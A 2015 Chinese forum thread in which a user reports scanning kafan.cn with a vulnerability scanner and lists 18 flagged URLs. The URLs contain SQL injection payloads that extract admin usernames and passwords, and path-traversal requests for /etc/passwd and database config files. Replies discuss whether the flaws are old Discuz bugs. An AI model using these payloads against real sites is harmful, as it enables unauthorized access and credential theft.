查看: 7791|回复: 18
收起左侧

[提问] 用北极熊扫描发现kafan.cn有多个漏洞。

 关闭 [复制链接]
ELOHIM
发表于 2015-12-8 21:11:24 | 显示全部楼层 |阅读模式
本帖最后由 ELOHIM 于 2015-12-8 21:16 编辑

www.kafan.cn 和 bbs.kafan.cn 分别具有多个漏洞。
不知道是否可以被恶意利用。
是否可修复。
扫描过后,本地IP被封,卡饭不能访问。
扫描过程应该具有攻击行为。
但是发现十数个漏洞是否需要修复呢?

-------------------------------------------------
ID漏洞地址来自脚本
1http://www.kafan.cn/index.php?q=xxoo’union select 1,uname,upass from appcms_admin_list where uid like ‘appcms.txt
2http://www.kafan.cn/forum.php?mod=attachment&findpost=ss&aid=1Discuz.txt
3http://www.kafan.cn/home.php?mod=space&uid=4&do=profileDiscuz.txt
4http://www.kafan.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x fespcms.txt
5http://www.kafan.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by xespcms.txt
6http://www.kafan.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by xespcms.txt
7http://www.kafan.cn/api.php?op=ajax_domain&url=/etc/passwdphpcms.txt
8http://www.kafan.cn/api.php?op=ajax_domain&url=caches/configs/system.phpphpcms.txt
9http://www.kafan.cn/api.php?op=ajax_domain&url=phpsso_server/caches/configs/uc_config.phpphpcms.txt
10http://www.kafan.cn/api.php?op=add_favorite&url=wooyun.in&title=%2527phpcms.txt
11http://www.kafan.cn/index.php?m=admin&c=index&a=login&pc_hash=MUPmkUphpcms.txt
12http://www.kafan.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.phpphpcms.txt
13http://www.kafan.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.phpphpcms.txt
14http://www.kafan.cn/index.php?m=member&c=index&a=register&siteid=1phpcms.txt
15http://www.kafan.cn/robots.txtphpcms.txt
16http://www.kafan.cn/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%phpcms.txt
17http://www.kafan.cn/index.php?showbrandid=0′ AND (SELECT 1 FROM (SELECT count( * ) , concat((SELECT concat( 0×23, user, 0x7e,password, 0×23 ) FROM dev_base_admin limit 0,1),floor( rand( 0 ) *2 ))x FROM information_schema.tables GROUP BY x)a)–%20phpweb.txt
18http://www.kafan.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.htmlshopex.txt


评分

参与人数 1经验 +5 收起 理由
DB69026 + 5 版区有你更精彩: )

查看全部评分

huihui458
发表于 2015-12-9 05:06:23 | 显示全部楼层
ctrlz2z
发表于 2015-12-9 14:57:26 | 显示全部楼层
迷之怕怕
边缘vip
发表于 2015-12-10 09:43:32 | 显示全部楼层
应该说除非放弃DZ,毕竟DZ不更新很久了
衣饭卡
发表于 2015-12-10 11:56:12 | 显示全部楼层
这些都是通用漏洞吧  
theone
发表于 2015-12-11 23:27:55 | 显示全部楼层
感谢,除了2和3,其他好像不是discuz的。
2,3对照查了下,好像是老版本较早之前的漏洞。
ELOHIM
 楼主| 发表于 2015-12-11 23:40:38 | 显示全部楼层
theone 发表于 2015-12-11 23:27
感谢,除了2和3,其他好像不是discuz的。
2,3对照查了下,好像是老版本较早之前的漏洞。

不客气。
詩、未詺
发表于 2015-12-12 11:55:33 | 显示全部楼层
select 1,uname,upass
from appcms_admin_list
where uid like ''
ELOHIM
 楼主| 发表于 2015-12-12 16:51:42 | 显示全部楼层
詩、未詺 发表于 2015-12-12 11:55
select 1,uname,upass
from appcms_admin_list
where uid like ''

这是很老的SQL注入吗?
ELOHIM
 楼主| 发表于 2015-12-12 16:53:36 | 显示全部楼层
詩、未詺 发表于 2015-12-12 11:55
select 1,uname,upass
from appcms_admin_list
where uid like ''

请问这个是SQL注入吗??
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-24 10:26 , Processed in 0.123395 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表